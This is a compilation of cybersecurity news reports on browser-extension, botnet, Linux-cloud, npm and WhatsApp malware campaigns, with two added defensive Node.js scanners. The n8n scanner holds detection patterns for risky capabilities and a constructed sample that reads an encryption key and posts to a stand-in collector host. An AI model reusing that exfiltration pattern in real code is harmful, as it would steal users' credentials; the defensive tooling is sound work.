
GhostPoster Malware Campaign Exposes Browser Extension Risks

 

Cybersecurity researchers have uncovered a stealthy malware operation that remained undetected for up to five years and accumulated more than 840,000 downloads across browser platforms. The investigation began with Koi Security's analysis of a Firefox browser extension called GhostPoster, which hid its malicious code inside a seemingly innocuous PNG image file. The trick let the malware evade both static analysis and the manual reviews conducted by browser extension stores.

Building on Koi Security's findings, LayerX researchers dug deeper into the infrastructure and identified 17 more extensions that used the same backend and shared the same tactics, techniques, and procedures (TTPs). Together these extensions had more than 840,000 downloads, and some had remained undetected on users' devices for almost five years. LayerX also found a more complex variant of the malware that used additional evasion techniques and had 3,822 downloads on its own.

The operation started on Microsoft Edge and then methodically expanded to Chrome and Firefox, the pattern of a patient, evolving threat actor focused on stealth and trust-building. The extensions initially delivered legitimate-looking functionality to avoid suspicion, while the malicious infrastructure remained in place for many years. This long-game approach shows how cybercriminals abuse browser extensions as a low-friction vector to compromise users without raising alarms in the short term.

Following the disclosure, Mozilla and Microsoft promptly removed the offending extensions from their official stores, preventing further downloads. Removal from a store, however, does nothing to the copies already installed in users' browsers, meaning millions might remain vulnerable unless they take action. LayerX's blog stressed that users need to take an active role in mitigating the ongoing risk by checking for and deleting the extensions.

Browser extensions have become a lucrative target for cybercriminals, who exploit the deep access these extensions have to browsing data and permissions, raising the stakes for vigilance in an evolving threat landscape. Users are advised to regularly review the permissions of their installed add-ons, disable the ones they don't use or need, and remove the ones they don't trust. The case is a warning that even extensions that have been trusted for a long time can contain malicious code, and it effectively calls on users of every major browser to adopt a more proactive approach to security.
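The PNG trick described above invites a structural check a reviewer can run on any image shipped inside an extension. The following is an added example, not code from the original post or from the Koi Security or LayerX research: it walks the PNG chunk layout, verifies each chunk's CRC, and reports bytes appended after IEND, chunk types the PNG specification does not define, and oversized metadata chunks. It assumes Node.js; the sample images and the "pYLd" chunk name are constructed, and the page does not say which hiding method GhostPoster actually used.

```javascript
'use strict';
// Added example (not Koi Security's or LayerX's code): walk a PNG's chunk structure and
// report the places where non-image bytes can hide. The page does not say how GhostPoster
// stored its code in the image, so this covers only the common hiding spots: data after
// IEND, chunk types the PNG specification does not define, and oversized metadata chunks.

const PNG_SIGNATURE = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);
// Chunk types registered by the PNG specification; anything else deserves a look.
const KNOWN_CHUNKS = new Set([
  'IHDR', 'PLTE', 'IDAT', 'IEND', 'tRNS', 'cHRM', 'gAMA', 'iCCP', 'sBIT', 'sRGB',
  'tEXt', 'zTXt', 'iTXt', 'bKGD', 'hIST', 'pHYs', 'sPLT', 'tIME', 'eXIf',
]);
const MAX_ANCILLARY_BYTES = 64 * 1024; // heuristic: metadata chunks rarely exceed this

// CRC-32 as PNG uses it (same polynomial as zlib), table driven.
const CRC_TABLE = new Uint32Array(256);
for (let n = 0; n < 256; n++) {
  let c = n;
  for (let k = 0; k < 8; k++) c = (c & 1) ? (0xedb88320 ^ (c >>> 1)) : (c >>> 1);
  CRC_TABLE[n] = c >>> 0;
}
function crc32(buf) {
  let c = 0xffffffff;
  for (const b of buf) c = CRC_TABLE[(c ^ b) & 0xff] ^ (c >>> 8);
  return (c ^ 0xffffffff) >>> 0;
}

// Returns { chunks, trailingBytes, findings }; an empty findings list means the layout is
// structurally clean (it says nothing about what the pixel data itself encodes).
function inspectPng(buf) {
  const chunks = [];
  const findings = [];
  if (buf.length < 8 || !buf.subarray(0, 8).equals(PNG_SIGNATURE)) {
    return { chunks, trailingBytes: 0, findings: ['missing PNG signature'] };
  }
  let offset = 8;
  let sawIend = false;
  while (offset + 12 <= buf.length) {
    const length = buf.readUInt32BE(offset);
    const type = buf.toString('latin1', offset + 4, offset + 8);
    if (offset + 12 + length > buf.length) {
      findings.push(`truncated chunk ${type} at offset ${offset}`);
      break;
    }
    // The CRC covers the type and data fields, not the length field.
    const expectedCrc = crc32(buf.subarray(offset + 4, offset + 8 + length));
    const storedCrc = buf.readUInt32BE(offset + 8 + length);
    if (storedCrc !== expectedCrc) findings.push(`CRC mismatch in ${type} at offset ${offset}`);
    if (!KNOWN_CHUNKS.has(type)) findings.push(`unknown chunk type ${type} (${length} bytes)`);
    // Bit 5 of the first type byte (a lowercase letter) marks an ancillary chunk.
    if ((type.charCodeAt(0) & 0x20) !== 0 && length > MAX_ANCILLARY_BYTES) {
      findings.push(`oversized ancillary chunk ${type} (${length} bytes)`);
    }
    chunks.push({ type, length, offset });
    offset += 12 + length;
    if (type === 'IEND') { sawIend = true; break; }
  }
  const trailingBytes = sawIend ? buf.length - offset : 0;
  if (!sawIend) findings.push('no IEND chunk');
  if (trailingBytes > 0) findings.push(`${trailingBytes} bytes after IEND`);
  return { chunks, trailingBytes, findings };
}

// Build one chunk: 4-byte big-endian length, 4-byte type, data, CRC over type+data.
function chunk(type, data) {
  const head = Buffer.alloc(8);
  head.writeUInt32BE(data.length, 0);
  head.write(type, 4, 'latin1');
  const crc = Buffer.alloc(4);
  crc.writeUInt32BE(crc32(Buffer.concat([head.subarray(4), data])), 0);
  return Buffer.concat([head, data, crc]);
}

// Constructed sample: a valid 1x1 greyscale PNG. Options add an unregistered chunk before
// IEND and/or a stand-in "payload" appended after IEND.
function buildSamplePng({ extraChunk = false, trailer = false } = {}) {
  const ihdr = Buffer.alloc(13);
  ihdr.writeUInt32BE(1, 0); // width
  ihdr.writeUInt32BE(1, 4); // height
  ihdr[8] = 8;              // bit depth; colour type, compression, filter, interlace stay 0
  // zlib stream holding one stored block of two bytes (filter byte 0, one grey pixel 0).
  const idat = Buffer.from([0x78, 0x01, 0x01, 0x02, 0x00, 0xfd, 0xff, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01]);
  const parts = [PNG_SIGNATURE, chunk('IHDR', ihdr), chunk('IDAT', idat)];
  if (extraChunk) parts.push(chunk('pYLd', Buffer.from('constructed stand-in for hidden data')));
  parts.push(chunk('IEND', Buffer.alloc(0)));
  if (trailer) parts.push(Buffer.from('constructed stand-in for an appended script'));
  return Buffer.concat(parts);
}

for (const opts of [{}, { extraChunk: true, trailer: true }]) {
  const report = inspectPng(buildSamplePng(opts));
  console.log(JSON.stringify(opts), report.chunks.map((c) => c.type).join(' '), report.findings);
}
```

A clean report only means the container is well-formed; code hidden inside the compressed pixel data would still need the image decoded and its pixels examined.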

Lumen Disrupts Aisuru–Kimwolf Botnet Powering Massive DDoS Attacks

 

Lumen Technologies’ Black Lotus Labs has successfully disrupted more than 550 command-and-control (C2) servers connected to the Aisuru and Kimwolf botnets, a large-scale malicious infrastructure widely used for distributed denial-of-service (DDoS) attacks and residential proxy abuse.

Aisuru operates as a DDoS-for-hire platform and deliberately avoids targeting government and military entities. However, broadband service providers have borne the brunt of its activity, with attacks surpassing 1.5Tb/sec originating from compromised customer devices, causing severe service interruptions.

Similar to other TurboMirai-based botnets, Aisuru includes enhanced DDoS capabilities alongside multifunctional features. These allow threat actors to engage in a range of illegal operations such as credential stuffing, AI-powered web scraping, spam campaigns, phishing attacks, and proxy services.

The botnet launches assaults using UDP, TCP, and GRE flood techniques, leveraging medium-sized packets with randomized ports and flags. Traffic volumes exceeding 1Tb/sec from infected customer premises equipment (CPEs) have disrupted broadband networks, while packet floods surpassing 4 billion packets per second have led to router line card failures.

Kimwolf, a recently identified Android-based botnet closely associated with Aisuru, has compromised more than 1.8 million devices and generated over 1.7 billion DDoS commands, according to cybersecurity firm XLab.

Primarily targeting Android TV boxes, the Kimwolf botnet is built using the Android NDK and includes capabilities such as DDoS attacks, proxy forwarding, reverse shell access, and file management. To conceal its operations, it encrypts sensitive information using a simple Stack XOR method, employs DNS over TLS for communication obfuscation, and verifies C2 commands through elliptic curve digital signatures. Newer variants also use EtherHiding, leveraging blockchain-based domains to evade takedown efforts.

Kimwolf variants follow a consistent naming convention of “niggabox + v[number],” with versions v4 and v5 currently observed in the wild. Researchers who seized control of a single C2 domain recorded interactions from approximately 2.7 million IP addresses within three days, reinforcing estimates that infections exceed 1.8 million devices. The botnet’s globally distributed infrastructure, multiple C2 servers, and varied versions make precise infection counts difficult.

Although Kimwolf borrows elements from the Aisuru codebase, its operators significantly modified it to avoid detection. While traffic proxying is its primary function, the botnet is capable of executing large-scale DDoS campaigns. This was evident during a three-day window between November 19 and 22, when it issued 1.7 billion attack commands.

Lumen observed daily bot traffic to Aisuru C2 servers rise sharply from 50,000 to 200,000 connections in September 2025. Upon validating the emergence of a new botnet, the company blocked the traffic and null-routed more than 550 C2 servers.

By examining C2 infrastructure and residential proxy traffic, researchers traced links to Canadian IP addresses and shared this intelligence with law enforcement agencies.

“The Canadian IPs in question were using SSH to access 194.46.59[.]169, which resolved to proxy-sdk.14emeliaterracewestroxburyma02132[.]su. In short order, we would learn that the Aisuru backend C2 we were tracking adopted the domain name client.14emeliaterracewestroxburyma02132[.]su, a similarity that further tied these servers together,” reads the report published by Lumen.

In early October, Black Lotus Labs detected infrastructure shifts signaling the rise of the Kimwolf botnet. Its growth was rapid, adding hundreds of thousands of infected devices within weeks, largely through exploitation of insecure residential proxy services. By mid-October, infections had reached approximately 800,000 devices, with the botnet actively scanning proxy networks to accelerate expansion.

Black Lotus Labs initiated disruption efforts against Kimwolf in October by swiftly null-routing its C2 servers. While operators were able to reestablish operations within hours, Lumen persistently blocked new infrastructure as it surfaced. Through continuous monitoring, collaboration with industry partners, and integration of threat indicators into its security products, Lumen worked to reduce the botnet’s operational capacity over time.

“To date, we have null-routed over 550 Aisuru/Kimwolf servers in 4 months as part of our efforts to combat this botnet, leading its operators to some distress, as noted in Xlabs’ post, showing the actors addressing Lumen with profanity in one DDoS payload,” concludes the report.


Researchers Disrupt Major Botnet Network After It Infects Millions of Android Devices

 


Security researchers have dismantled a substantial portion of the infrastructure powering the Kimwolf and Aisuru botnets, cutting off communication to more than 550 command-and-control servers used to manage infected devices. The action was carried out by Black Lotus Labs, the threat intelligence division of Lumen Technologies, and began in early October 2025.

Kimwolf and Aisuru operate as large-scale botnets, networks of compromised devices that can be remotely controlled by attackers. These botnets have been used to launch distributed denial-of-service attacks and to route internet traffic through infected devices, effectively turning them into unauthorized residential proxy nodes.

Kimwolf primarily targets Android systems, with a heavy concentration on unsanctioned Android TV boxes and streaming devices. Prior technical analysis showed that the malware is delivered through a component known as ByteConnect, which may be installed directly or bundled into applications that come preloaded on certain devices. Once active, the malware establishes persistent access to the device.

Researchers estimate that more than two million Android devices have been compromised. A key factor enabling this spread is the exposure of Android Debug Bridge services to the internet. When left unsecured, this interface allows attackers to install malware remotely without user interaction, enabling rapid and large-scale infection.

Follow-up investigations revealed that operators associated with Kimwolf attempted to monetize the botnet by selling access to the infected devices’ internet connections. Proxy bandwidth linked to compromised systems was offered for sale, allowing buyers to route traffic through residential IP addresses in exchange for payment.

Black Lotus Labs traced parts of the Aisuru backend to residential SSH connections originating from Canadian IP addresses. These connections were used to access additional servers through proxy infrastructure, masking malicious activity behind ordinary household networks. One domain tied to this activity briefly appeared among Cloudflare’s most accessed domains before being removed due to abuse concerns.

In early October, researchers identified another Kimwolf command domain hosted on infrastructure linked to a U.S.-based hosting provider. Shortly after, independent reporting connected multiple proxy services to a now-defunct Discord server used to advertise residential proxy access. Individuals associated with the hosting operation were reportedly active on the server for an extended period.

During the same period, researchers observed a sharp increase in Kimwolf infections. Within days, hundreds of thousands of new devices were added to the botnet, with many of them immediately listed for sale through a single residential proxy service.

Further analysis showed that Kimwolf infrastructure actively scanned proxy services for vulnerable internal devices. By exploiting configuration flaws in these networks, the malware was able to move laterally, infect additional systems, and convert them into proxy nodes that were then resold.

Separate research uncovered a related proxy network built from hundreds of compromised home routers operating across Russian internet service providers. Identical configurations and access patterns indicated automated exploitation at scale. Because these devices appear as legitimate residential endpoints, malicious traffic routed through them is difficult to distinguish from normal consumer activity.

Researchers warn that the abuse of everyday consumer devices continues to provide attackers with resilient, low-visibility infrastructure that complicates detection and response efforts across the internet.

VoidLink Malware Poses Growing Risk to Enterprise Linux Cloud Deployments


 

As organizations continue to increase their reliance on cloud computing, a new cybersecurity threat has emerged beneath the surface of modern digital infrastructure. Researchers warn that a subtle but dangerous shift is under way.

According to Check Point Research, a highly sophisticated malware framework known as VoidLink is being developed by a group of cybercriminals specifically to infiltrate and persist within Linux-based cloud environments.

Even as much of the industry's defensive focus remains on Windows-centric threats, VoidLink's appearance underscores a strategic shift by advanced threat actors toward the Linux-based systems that underpin cloud platforms, containerized workloads, and critical enterprise services.

Rather than a simple piece of malicious code, VoidLink is a complex ecosystem designed to give its operators long-term, covert control over compromised servers, effectively turning cloud infrastructure into an attack vector in its own right.

The architecture and operational depth of the malware strongly suggest it was designed by well-resourced, professional adversaries rather than opportunistic criminals, posing a serious challenge for defenders who may not know that their systems are being silently commandeered for malicious purposes.

Check Point Research's detailed analysis concludes that VoidLink is not a single piece of malicious code but a fully developed, cloud-native framework made up of customized loaders, implants, rootkits, and a variety of modular plugins that let operators extend, modify, and repurpose its functionality as their operational requirements evolve.

First identified in December 2025, the framework was built with a deliberate emphasis on persistence, dependability, and adaptability within cloud and containerized environments.

VoidLink's architecture is built around a bespoke Plugin API that draws conceptual parallels to Cobalt Strike's Beacon Object Files model. More than 30 modules are available, and operators can swap them in and out rapidly without redeploying the core implant.

The primary implant is written in Zig. It can detect the major cloud platforms, including Amazon Web Services, Google Cloud, Microsoft Azure, Alibaba, and Tencent, and dynamically adjusts its behavior when it finds itself running inside Docker containers or Kubernetes pods.

Beyond this environmental awareness, the malware can harvest credentials linked to cloud services and to widely used source code management platforms such as Git, showing an operational focus on software development environments.

Researchers attribute the actively maintained framework to threat actors linked to China. Its emergence emphasizes a broader strategic shift away from Windows-centric attacks toward the Linux-based systems that form the basis of cloud infrastructure and critical digital operations, with potential consequences ranging from data theft to the compromise of large-scale supply chains.

Referred to internally by its developers as VoidLink, the framework is built as a cloud-first implant written in the Zig programming language and designed for deployment across modern, distributed environments.

It identifies the major cloud platforms, determines whether it is running inside Docker containers or Kubernetes clusters, and dynamically adjusts its behavior to fit that environment.

In addition, the malware is designed to steal credentials tied to cloud-based services and to popular source code management systems such as Git. That capability makes software development environments a likely target for intelligence collection, or a place from which future supply chain operations could be conducted.

VoidLink's technical breadth further distinguishes it from conventional Linux malware. It incorporates rootkit-like techniques built on LD_PRELOAD, loadable kernel modules, and eBPF, as well as an in-memory plugin system that allows new functions to be added without reinstalling the core implant.

Its stealth mechanism detects the presence of security tooling and alters its evasion behavior accordingly, prioritizing operational concealment in closely monitored environments.

The framework also provides several command-and-control mechanisms, including HTTP and HTTPS, ICMP, and DNS tunneling, and can establish peer-to-peer or mesh-like communication among compromised hosts. There is some evidence that most components are nearing full maturity.

A functional command-and-control server is under development, along with an integrated web-based management interface that gives operators centralized control of agents, implants, and plugins. To date, no real-world infection has been confirmed.

VoidLink's ultimate purpose also remains unclear, but its sophistication, modularity, and apparent commercial-grade polish suggest it is designed for wider operational deployment, either as a tailored offensive tool created for a particular client or as a productized offensive framework.

Check Point Research further notes that VoidLink is accompanied by a fully featured, web-based command-and-control dashboard that gives operators centralized monitoring and analysis of compromised systems, including post-exploitation activity.

Its interface, localized for Chinese-language users, supports operations across the familiar phases of reconnaissance, credential harvesting, persistence, lateral movement, and evidence destruction, confirming that the framework is designed for sustained, methodical campaigns rather than opportunistic ones.

Although there were no confirmed real-world infections as of January 2026, researchers state that the framework has reached an advanced state of maturity, including an integrated C2 server, a polished operations dashboard, and an extensive plugin ecosystem, which indicates that its deployment could be imminent.

The design philosophy behind the malware is to gain long-term access to cloud environments and keep a close eye on their users, which marks a significant step up in the sophistication of Linux-focused malware. The researchers argue in their analysis that VoidLink's modular plugins extend its reach beyond cloud workloads to the developer and administrator workstations that interact directly with those environments.

If not properly protected, a compromised system is effectively transformed into a staging ground for further intrusions or potential supply chain compromises. The researchers conclude that the emergence of such an advanced framework underscores a broader shift in attackers' interest toward Linux-based cloud and container platforms and away from traditional Windows-based targets.

As attacks become increasingly advanced, organizations are being prompted to step up their security efforts across the full spectrum of Linux, cloud, and containerized infrastructure. Although VoidLink was discovered by chance and before any confirmed deployment, it serves as a timely reminder that security assumptions must evolve as rapidly as the infrastructure itself.

Since attackers are increasingly investing in frameworks built to blend into Linux and containerized environments, organizations can no longer protect critical assets with perimeter-based controls and Windows-focused threat models alone.

Security teams are increasingly adopting a cloud-aware defense posture that emphasizes continuous monitoring, least-privilege access, and rigorous scrutiny of the development and administrative endpoints used to bridge on-premises and cloud platforms.

Efficient identity management, hardened container and Kubernetes configurations, and increased visibility into east-west traffic within cloud environments can go a long way toward preventing long-term, covert compromises of cloud deployments.

It is also vital to strengthen collaboration between security, DevOps, and platform engineering teams so that detection and response capabilities keep pace with an ever-changing, adaptive threat landscape.

Modern enterprises depend on digital infrastructure to run their businesses, and as frameworks like VoidLink move closer to real-world deployment, investing in Linux and cloud security now is important not only for mitigating emerging risks but also for strengthening the resilience of the infrastructure that supports them.

n8n Supply Chain Attack Exploits Community Nodes In Google Ads Integration to Steal Tokens


Hackers were found uploading a set of eight packages to the npm registry that posed as integrations for the n8n workflow automation platform in order to steal developers’ OAuth credentials. 

About the exploit 

One package, called “n8n-nodes-hfgjf-irtuinvcm-lasdqewriit”, mimics the Google Ads integration, asks users to connect their ad account through a fake form, and sends the stolen OAuth credentials to servers under the threat actors’ control. 

Endor Labs, which released a report on the incident, said: “The attack represents a new escalation in supply chain threats.” It added that “unlike traditional npm malware, which often targets developer credentials, this campaign exploited workflow automation platforms that act as centralized credential vaults – holding OAuth tokens, API keys, and sensitive credentials for dozens of integrated services like Google Ads, Stripe, and Salesforce in a single location.” 

Attack tactic 

Experts are not sure whether all of the packages share the same malicious functionality. ReversingLabs’ Spectra Assure analysed a few of the packages and found no security issues in them, but in one package, “n8n-nodes-zl-vietts,” it found a malicious component with a known malware history. 

The campaign may still be active, as an updated version of the package “n8n-nodes-gg-udhasudsh-hgjkhg-official” was recently posted to npm.

Once installed as a community node, the malicious package behaves like a typical n8n integration and displays configuration screens. When a workflow is started, it runs code that decrypts the stored tokens using n8n’s master key and sends the stolen data to a remote server. 

This is the first time a supply chain attack has specifically targeted the n8n ecosystem, with the hackers exploiting the trust placed in community integrations. 

New risks in ad integration 

The report highlights the security gaps that come with integrating untrusted workflows, which expand the attack surface. Experts advise developers to audit packages before installing them, scrutinize package metadata for anything anomalous, and use official n8n integrations. 

According to researchers Kiran Raj and Henrik Plate, "Community nodes run with the same level of access as n8n itself. They can read environment variables, access the file system, make outbound network requests, and, most critically, receive decrypted API keys and OAuth tokens during workflow execution.”
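The access model the researchers describe (nodes that receive decrypted credentials and can read the environment, touch the file system and make outbound requests) is what a pre-install review should look for. The following is an added example, not code from Endor Labs, ReversingLabs or the n8n project: a static triage pass over a community node package that reads the manifest (n8n community nodes list their node files under the "n8n" key of package.json), scans the referenced source for those capabilities, lists every host the code contacts, and flags random-looking name segments like the ones on this page. It assumes Node.js; the two sample packages, their file paths, and the `.example` and `.invalid` hosts are constructed.

```javascript
'use strict';
// Added example, not code from Endor Labs, ReversingLabs or the n8n project: a static
// triage pass over an n8n community node package before it is installed. It reads the
// package manifest (community nodes declare their node files under the "n8n" key of
// package.json), scans the referenced source for the capabilities the quoted researchers
// warn about, lists every host the code talks to, and flags random-looking name
// segments. The two sample packages below are constructed in-memory file maps.

const CAPABILITIES = [
  { id: 'credentials', label: 'receives decrypted credentials', re: /\bgetCredentials\s*\(/ },
  { id: 'network', label: 'makes outbound requests', re: /\bfetch\s*\(|\bhttpRequest\s*\(|require\(['"](?:node:)?https?['"]\)|\baxios\b/ },
  { id: 'env', label: 'reads environment variables', re: /\bprocess\.env\b/ },
  { id: 'fs', label: 'touches the file system', re: /require\(['"](?:node:)?fs(?:\/promises)?['"]\)|from\s+['"](?:node:)?fs(?:\/promises)?['"]/ },
  { id: 'exec', label: 'spawns child processes', re: /require\(['"](?:node:)?child_process['"]\)|from\s+['"](?:node:)?child_process['"]/ },
  { id: 'obfuscation', label: 'decodes or evaluates hidden strings', re: /\batob\s*\(|['"]base64['"]\)|\beval\s*\(|new\s+Function\s*\(/ },
];
// Heuristic: a run of four or more consonants in a name segment (e.g. "hfgjf") is rare in
// real words and common in the throwaway names seen in this campaign. It is not exact.
const CONSONANT_RUN = /[bcdfghjklmnpqrstvwxz]{4}/i;

function suspiciousNameSegments(packageName) {
  return packageName
    .replace(/^n8n-nodes-/, '')
    .split('-')
    .filter((seg) => seg.length >= 5 && CONSONANT_RUN.test(seg));
}

function extractHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  return [...hosts].sort();
}

// files: Map of relative path -> file contents, as read from the unpacked package tarball.
function triagePackage(files) {
  const findings = [];
  const manifest = JSON.parse(files.get('package.json') || '{}');
  const name = manifest.name || '(unnamed)';
  const nodeFiles = (manifest.n8n && manifest.n8n.nodes) || [];
  if (nodeFiles.length === 0) findings.push('manifest declares no n8n nodes');
  const nameFlags = suspiciousNameSegments(name);
  if (nameFlags.length) findings.push(`random-looking name segments: ${nameFlags.join(', ')}`);

  const caps = new Set();
  const hosts = new Set();
  for (const path of nodeFiles) {
    const src = files.get(path);
    if (src === undefined) { findings.push(`manifest references missing file ${path}`); continue; }
    for (const cap of CAPABILITIES) if (cap.re.test(src)) caps.add(cap.id);
    for (const h of extractHosts(src)) hosts.add(h);
  }
  // Every real integration both holds credentials and talks out, so that pair alone only
  // earns "review"; combined with env/fs/exec/obfuscation or a junk name it becomes "high".
  const handlesSecretsAndTalksOut = caps.has('credentials') && caps.has('network');
  const extra = ['env', 'fs', 'exec', 'obfuscation'].some((id) => caps.has(id));
  let risk = 'low';
  if (handlesSecretsAndTalksOut) risk = (extra || nameFlags.length) ? 'high' : 'review';
  if (handlesSecretsAndTalksOut && hosts.size > 1) findings.push(`talks to ${hosts.size} distinct hosts; confirm each belongs to the integration`);
  return { name, risk, capabilities: [...caps], hosts: [...hosts].sort(), findings };
}

// Constructed sample 1: a plausible integration node that needs credentials and one API host.
const BENIGN = new Map([
  ['package.json', JSON.stringify({
    name: 'n8n-nodes-example-weather',
    keywords: ['n8n-community-node-package'],
    n8n: { nodes: ['dist/nodes/Weather.node.js'] },
  })],
  ['dist/nodes/Weather.node.js', `
    async execute() {
      const creds = await this.getCredentials('weatherApi');
      return this.helpers.httpRequest({ url: 'https://api.weather.example/v1/today', headers: { 'X-Key': creds.apiKey } });
    }`],
]);

// Constructed sample 2: the shape the page describes, with the package name taken from the
// report, a stand-in collector host and no working payload.
const SUSPICIOUS = new Map([
  ['package.json', JSON.stringify({
    name: 'n8n-nodes-hfgjf-irtuinvcm-lasdqewriit',
    keywords: ['n8n-community-node-package'],
    n8n: { nodes: ['dist/nodes/GoogleAds.node.js'] },
  })],
  ['dist/nodes/GoogleAds.node.js', `
    async execute() {
      const creds = await this.getCredentials('googleAdsOAuth2Api');
      const masterKey = process.env.N8N_ENCRYPTION_KEY;
      await fetch('https://collector.invalid/upload', { method: 'POST' });
      return this.helpers.httpRequest({ url: 'https://googleads.googleapis.com/v17/customers' });
    }`],
]);

for (const pkg of [BENIGN, SUSPICIOUS]) console.log(JSON.stringify(triagePackage(pkg), null, 2));
```

The name heuristic deliberately misses "n8n-nodes-zl-vietts" from the same campaign, which is why the capability and host checks, not the name, should drive the decision.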

Man Sentenced to Seven Years for Hacking Port IT Systems to Enable Drug Imports

 



A Dutch appeals court has sentenced a 44-year-old man to seven years in prison for his involvement in cyber intrusions targeting major European ports and for using those breaches to support drug trafficking operations.

The ruling was issued by the Amsterdam Court of Appeal, which reviewed a case that began with the man’s arrest in 2021. He was initially convicted a year later by the Amsterdam District Court on multiple charges, including illegal access to computer systems, attempted extortion, and assisting in the import of narcotics. Following that decision, the defendant challenged the verdict, arguing that key evidence used against him had been obtained unlawfully.

At the center of the appeal was the use of messages collected from Sky ECC, an encrypted communication platform. Law enforcement agencies in Europe gained access to the service in 2021 as part of a coordinated investigation into organized crime. That operation led to the arrest of the platform’s leadership and numerous users, with legal proceedings continuing into the following years. The defense claimed that the interception of these communications violated procedural safeguards and undermined the fairness of the trial.

The appeals court rejected those objections, stating that the defense failed to demonstrate how the collection of Sky ECC messages breached the defendant’s legal rights. As a result, most of the original findings were upheld.

However, the court did overturn one charge related to a plan to import approximately 5,000 kilograms of cocaine. Despite this, judges maintained the remaining convictions, including those tied to cybercrime and drug-related offenses.

Court findings show that the man worked with others to breach IT systems used by port operations in Rotterdam and Barendrecht in the Netherlands, as well as Antwerp in Belgium. These systems are responsible for managing logistics and cargo movement within the ports. By gaining unauthorized access, the group aimed to manipulate information so that illegal drug shipments could pass through undetected.

The intrusion was carried out by infecting internal systems at a port logistics company. Malware was introduced through USB devices that were connected by company employees. Authorities have not clarified whether those individuals were coerced, deceived, or willingly involved.

Once the malware was installed, the attacker was able to deploy remote access tools. This allowed him to extract data from internal databases and monitor information as it moved through the network, giving criminal groups operational insight into port activities.

Investigators also found that between mid-September 2020 and late April 2021, the man attempted to sell malicious software along with instructions for its use, working in coordination with others.

Taking into account the hacking activities, the facilitation of drug trafficking, the import of 210 kilograms of cocaine into the Netherlands, and attempted extortion, the court confirmed a final prison sentence of seven years.

WhatsApp-Based Worm Drives Rapid Expansion of Astaroth Malware in Brazil


After being exposed to a new and more aggressive distribution campaign involving the Astaroth banking trojan, which is a long-standing malware strain known for targeting financial users in the country, the cyber threat landscape in Brazil is once again coming under scrutiny. 


Astaroth has recently launched a new operation, internally referred to as Boto Cor-de-Rosa, which marks a significant shift in the organization's propagation methods by incorporating WhatsApp Web into its infection chain that marks a major shift in its propagation strategies. 

A malicious script in this campaign is capable of harvesting the contact list of the victim on WhatsApp and autonomously sending malicious messages to those contacts, effectively turning that compromised WhatsApp account into a self-propagating infection vector. 

A number of analysts are observing the Astaroth Boto Cor-de-Rosa operation as a clear indicator of a sharp rise in both technical sophistication and social engineering precision. Using rapid self-propagation capabilities and longstanding ability to steal banking credentials, this operation is a very sophisticated one. 

There is a dual-purpose architecture at the heart of this campaign that allows the malware to spread autonomously, while at the same time monitoring the online activity of the victims. It is a simple process of spreading malicious messages via WhatsApp that uses the natural, culturally familiar Portuguese language to reach users, capitalizing on the inherent trust users have placed in communications they receive from familiar people. 

In spite of the fact that the banking module is discreetly installed in the background, it keeps track of a victim's browser sessions and activates only when the victim visits a financial institution or payment service website. It then attempts to intercept sensitive information, such as usernames and passwords. 

Researchers stress that because of the fusion between worm-like distribution and financial espionage, there is a higher risk to Brazilian banking customers as the threat of infection is heightened along with the threat of precision data theft that it presents. 

In addition to the campaign's effectiveness, the campaign's effectiveness is further enhanced by the fact that it has a very narrow geographic focus, with lures that are tailored exclusively for Brazilian users and that are dynamically adjusted to local time zones using greetings such as "Bom dia," and "Good afternoon.". 

When the level of cultural customization of the phishing campaign is paired with WhatsApp's being a deeply trusted and widely used communication channel in Brazil, the user suspicion is significantly lowered, which in turn enhances the success rates of infections as compared with conventional email-based phishing campaigns. 

Boto Cor-de-Rosa also represents an important evolution step for Astaroth from the standpoint of a technical point of view, as it introduces a Python-based variant of the WhatsApp worm in addition to the trojan's established Delphi core. 

A number of analysts perceive the shift from a traditional delivery vector, which is based on a technical flaw, toward a modular, multilingual design as a deliberate move by the operators to enhance flexibility, evade detection, and decouple credential theft from propagation. 

Rather than relying on traditional delivery vectors, they are instead opting to exploit human trust rather than technical weaknesses by developing relationship-driven attacks.

Although Astaroth's primary payload is still crafted in Delphi, and its installer is still crafted in Visual Basic scripting, analysts noticed that the newly introduced WhatsApp worm component has been written in Python, which highlights the operators' increasing reliance on modular, multi-lingual development, as evidenced by the new worm component. 

By leveraging region-specific social engineering lures, intimate knowledge of the network ecosystems in local areas, and widely trusted communication platforms, Astaroth achieves high infection rates, maximizing its reach and sustaining high infection rates throughout the campaign. 

Astaroth, a banking trojan that was identified nearly a decade ago, was also known as Guildma and has consistently maintained a persistent presence in the cybercrime ecosystem since 2015, becoming one of the most prominent banking trojans targeting Latin America, primarily Brazil. 

Since this malware has historically been distributed through large-scale phishing campaigns, it has emerged in recent years through two distinct malicious threat clusters. The two threats have been identified as PINEAPPLE and Water Makara, both of which are targeting organizations through deceptive email lures to initiate an infection campaign.

Threat actors are increasingly forgoing traditional delivery methods in favor of WhatsApp as a propagation channel, a tactic well suited to Brazil given WhatsApp's near-ubiquitous adoption there.

The security industry has documented numerous instances of this technique, for example Water Saci's use of WhatsApp to disseminate the Maverick trojan and a modified variant of Casbaneiro. In November 2025, Sophos described a multi-stage campaign tracked as STAC3150 that distributes Astaroth through WhatsApp messages, with the majority of infections reported in Brazil.

A smaller share of confirmed infections, roughly 9 percent, was observed in the United States and Austria. The operation has been running since at least late September 2025 and distributes ZIP archives containing downloader components that retrieve PowerShell- or Python-based scripts to harvest WhatsApp contact data and spread onward, along with MSI installers carrying the banking trojan itself.

Acronis' latest findings indicate that this technique remains in active use: malicious ZIP files sent via WhatsApp are still the primary vector for disseminating Astaroth.

According to Acronis, the campaign's effectiveness rests primarily on a functional split between propagation and credential theft, which maximizes both reach and financial return.

The infection begins when the victim executes a malicious ZIP file delivered over WhatsApp. The malware then deploys two distinct components: one for propagation, which drives continued spread, and one for credential theft.

The propagation component harvests the victim's WhatsApp contact list and automatically sends fresh malicious ZIP archives to each contact, creating a persistent, self-sustaining infection loop.

The banking component, meanwhile, remains dormant in the background, silently monitoring browsing activity. When the user visits a banking or financial service website, it activates, captures the credentials the user enters, and facilitates fraudulent transactions.

Technically, the attack relies on an obfuscated Visual Basic script concealed within the ZIP archive, which serves as the initial downloader. This script retrieves and executes both the Astaroth banking trojan and the Python-based WhatsApp spreader.

